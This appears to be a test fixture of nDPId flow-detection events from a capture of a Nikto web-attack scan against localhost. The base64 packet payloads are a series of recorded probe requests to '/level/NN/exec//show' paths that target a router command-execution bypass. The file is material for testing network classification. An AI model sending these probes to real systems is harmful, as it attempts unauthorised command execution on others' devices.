-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277681,"pkt":"AAAAAAAAAAAAAAAACABFAADIw2NAAEAGeMp\/AAABfwAAAcZqH5BLUvpuf7sPloAYAED+vAAAAQEICp1m\/tmdZv7ZR0VUIC9sZXZlbC82OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTUpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277683,"pkt":"AAAAAAAAAAAAAAAACABFAADIBQVAAEAGNyl\/AAABfwAAAcZsH5CyYjwQgGi0OYAYAED+vAAAAQEICp1m\/tudZv7bR0VUIC9sZXZlbC82OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/69\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001316)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277685,"pkt":"AAAAAAAAAAAAAAAACABFAADI1dZAAEAGZld\/AAABfwAAAcZuH5B\/K+zaVaEXFIAYAED+vAAAAQEICp1m\/tydZv7cR0VUIC9sZXZlbC83MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTcpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277685,"flow_last_seen":1576420277685,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50798,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/70\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001317)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277687,"pkt":"AAAAAAAAAAAAAAAACABFAADIUq1AAEAG6YB\/AAABfwAAAcZwH5AONGunkxG0mYAYAED+vAAAAQEICp1m\/t+dZv7fR0VUIC9sZXZlbC83MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277687,"flow_last_seen":1576420277687,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50800,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/71\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001318)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277689,"pkt":"AAAAAAAAAAAAAAAACABFAADIo8lAAEAGmGR\/AAABfwAAAcZyH5BwuZrK24oufIAYAED+vAAAAQEICp1m\/uGdZv7hR0VUIC9sZXZlbC83Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277689,"flow_last_seen":1576420277689,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50802,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/72\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001319)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277691,"pkt":"AAAAAAAAAAAAAAAACABFAADIVsBAAEAG5W1\/AAABfwAAAcZ0H5BhJ2+x3S4KSIAYAED+vAAAAQEICp1m\/uOdZv7jR0VUIC9sZXZlbC83My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277691,"flow_last_seen":1576420277691,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277691,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50804,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/73\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001320)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_packet_id":1,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277693,"pkt":"AAAAAAAAAAAAAAAACABFAADIebZAAEAGwnd\/AAABfwAAAcZ2H5BNR0C8mP2KqIAYAED+vAAAAQEICp1m\/uWdZv7lR0VUIC9sZXZlbC83NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277693,"flow_last_seen":1576420277693,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277693,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50806,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/74\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001321)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_packet_id":1,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277695,"pkt":"AAAAAAAAAAAAAAAACABFAADIMBZAAEAGDBh\/AAABfwAAAcZ4H5ACzwkce7l1k4AYAED+vAAAAQEICp1m\/uadZv7mR0VUIC9sZXZlbC83NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzIyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":623,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277695,"flow_last_seen":1576420277695,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50808,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/75\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001322)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_packet_id":1,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277699,"pkt":"AAAAAAAAAAAAAAAACABFAADIwYhAAEAGeqV\/AAABfwAAAcZ6H5CkKPiYt3JQbIAYAED+vAAAAQEICp1m\/uudZv7rR0VUIC9sZXZlbC83Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjMpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":624,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277699,"flow_last_seen":1576420277699,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50810,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/76\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001323)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_packet_id":1,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277701,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/s1AAEAGPWB\/AAABfwAAAcZ8H5AcB8fbr66aJ4AYAED+vAAAAQEICp1m\/u2dZv7tR0VUIC9sZXZlbC83Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":625,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277701,"flow_last_seen":1576420277701,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50812,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/77\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001324)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_packet_id":1,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277702,"pkt":"AAAAAAAAAAAAAAAACABFAADIfWpAAEAGvsN\/AAABfwAAAcZ+H5A9kER6aVFtF4AYAED+vAAAAQEICp1m\/u6dZv7uR0VUIC9sZXZlbC83OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277702,"flow_last_seen":1576420277702,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277702,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50814,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/78\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001325)"}} 